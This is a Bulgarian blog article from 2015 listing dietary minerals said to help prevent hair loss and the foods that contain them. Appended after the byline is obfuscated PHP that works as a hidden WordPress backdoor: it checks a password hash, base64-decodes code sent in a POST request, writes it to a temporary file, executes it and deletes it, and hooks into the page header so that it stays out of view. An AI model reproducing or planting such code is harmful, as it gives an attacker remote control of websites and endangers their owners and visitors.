Важните минерали срещу косопад | Косопад

Важните минерали срещу косопад

kosa-dieta

Храненето е много важно, ако искаме да предотвратим или да преборим косопада. Нека разгледаме кои минерали са необходими, за да имаме здрава коса:

Сяра. Съдържа се в бялото месо, черния дроб, яйцата, зеленчуците, плодовете и бадемите. Прави по- силна слабата и късаща се коса. Помага за синтеза на кератин и колаген.

Мед. Съдържа се в морските дарове, спанака и орехите. Много е важен за производството на меланина.

Желязо. Съдържа се в червеното месо и зеленчуците. Помага за пигментацията на косата и достигането на кислорода до скалпа.

Магнезий. Съдържа се в спанака, житото, бадемите, бананите, кестените и фурмите. Консумацията му благоприятства метаболитните процеси и активира ензимните реакции, необходими за здравето на косата.

Healthy life concept

Минерални соли. Съдържат се в спанака, пълнозърнестия хляб, ядките и др. Правят косата по- силна.

Селен. Съдържа се в рибата. Помага срещу свободните радикали.

Цинк. Съдържа се в морските дарове, рибата и осоленото месо, яйцата, бирената мая, житния зародиш, смокините, аспержите, патладжаните и целината. Има още много храни, които помагат за растежа на косата, стимулират множенето на клетките и възстановяването на тъканите. Важен минерал при тънка коса без блясък.

Йод (йодирана сол). Предпазва от болести на щитовидната жлеза, като хипотиреоидизъм, който прави косата суха, често води до косопад.

02. юли 2015 19:58:58 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | 34 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}